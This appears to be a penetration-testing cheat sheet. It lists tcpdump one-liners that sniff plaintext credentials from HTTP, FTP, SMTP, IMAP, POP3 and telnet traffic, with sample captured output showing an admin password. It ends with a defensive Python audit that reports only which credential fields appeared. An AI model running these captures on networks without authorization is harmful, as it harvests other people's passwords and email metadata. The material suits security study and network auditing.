Network Sniffing

HTTP (port 80) in use on the network? Plaintext credentials can be sniffed with tcpdump.

Capture SMTP Email

tcpdump -nn -l -A port 25 | grep -i 'MAIL FROM\|RCPT TO'

(-A prints each packet's payload as ASCII; without it tcpdump shows only headers and grep has nothing to match.)

Extract HTTP Passwords in POST Requests

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"

Capture FTP Credentials and Commands

tcpdump -nn -v -A port ftp or ftp-data

Capture all plaintext passwords

root@WEB01:/# tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
07:44:57.364252 IP 172.16.1.23.http > 172.16.1.30.51445: Flags [P.], seq 1:26, ack 268, win 237, length 25: HTTP: HTTP/1.1 100 Continue
E..A1f@[email protected]..^$'..k.pP...Z...HTTP/1.1 100 Continue


07:44:57.394599 IP 172.16.1.30.51445 > 172.16.1.23.http: Flags [P.], seq 268:347, ack 26, win 2053, length 79: HTTP
[email protected]^$'.P...zT..username=admin&password=Password123

username=admin&password=Password123
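As an added, defender-side example that is not part of the original notes: the same field-name pattern as the egrep above, run over constructed `tcpdump -nn -l -A` output, reporting which hosts and services carried credentials in the clear. Only the field names are reported, never the values, so the result can be handed to the asset owner to get the service moved to TLS without re-exposing the sniffed secret; the header layout assumed is tcpdump's numeric `-nn` form.

```python
import re
from typing import Dict, List

# Constructed sample in the shape `tcpdump -nn -l -A` prints: one header line per
# packet, then the ASCII dump of its payload (hosts and values are made up).
SAMPLE_CAPTURE = """\
07:44:57.364252 IP 172.16.1.23.80 > 172.16.1.30.51445: Flags [P.], seq 1:26, ack 268, win 237, length 25: HTTP: HTTP/1.1 100 Continue
E..A1f@.@...HTTP/1.1 100 Continue
07:44:57.394599 IP 172.16.1.30.51445 > 172.16.1.23.80: Flags [P.], seq 268:347, ack 26, win 2053, length 79: HTTP
E..w..@.@...username=admin&password=Password123
07:45:02.101000 IP 172.16.1.30.51502 > 172.16.1.40.21: Flags [P.], seq 1:12, ack 1, win 229, length 11: FTP: USER alice
E..3..@.@...USER alice
07:45:02.300000 IP 172.16.1.30.51502 > 172.16.1.40.21: Flags [P.], seq 12:25, ack 20, win 229, length 13: FTP: PASS s3cret
E..5..@.@...PASS s3cret
"""

# Packet header line: "<time> IP <src>.<sport> > <dst>.<dport>: ..."
HEADER_RE = re.compile(r"^\S+ IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+):")
# Same field names as the egrep above, followed by '=', ':' or whitespace so it
# covers form bodies, "login:" prompts and FTP/telnet style "USER x" / "PASS y".
CRED_KEY_RE = re.compile(
    r"\b(password|passwd|passw|pass|pwd|pw|username|user|login|log)(?==|:|\s)", re.I)
PLAINTEXT_PORTS = {80: "http", 21: "ftp", 25: "smtp", 143: "imap", 110: "pop3", 23: "telnet"}


def audit_plaintext_credentials(capture_text: str) -> List[Dict]:
    """One finding per packet whose payload carries a credential field; only
    field names are reported, never values, so the sniffed secret is not re-exposed."""
    findings: List[Dict] = []
    header, payload = None, []

    def flush() -> None:
        if header is None:
            return
        keys = {m.group(1).lower() for m in CRED_KEY_RE.finditer("\n".join(payload))}
        if keys:
            src, sport, dst, dport = header
            service = PLAINTEXT_PORTS.get(int(dport)) or PLAINTEXT_PORTS.get(int(sport))
            findings.append({"src": src, "dst": dst, "fields": sorted(keys),
                             "service": service or f"tcp/{dport}"})

    for line in capture_text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            flush()                      # close out the previous packet
            header, payload = m.groups(), []
        else:
            payload.append(line)         # ASCII dump lines belong to the current packet
    flush()
    return findings
```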
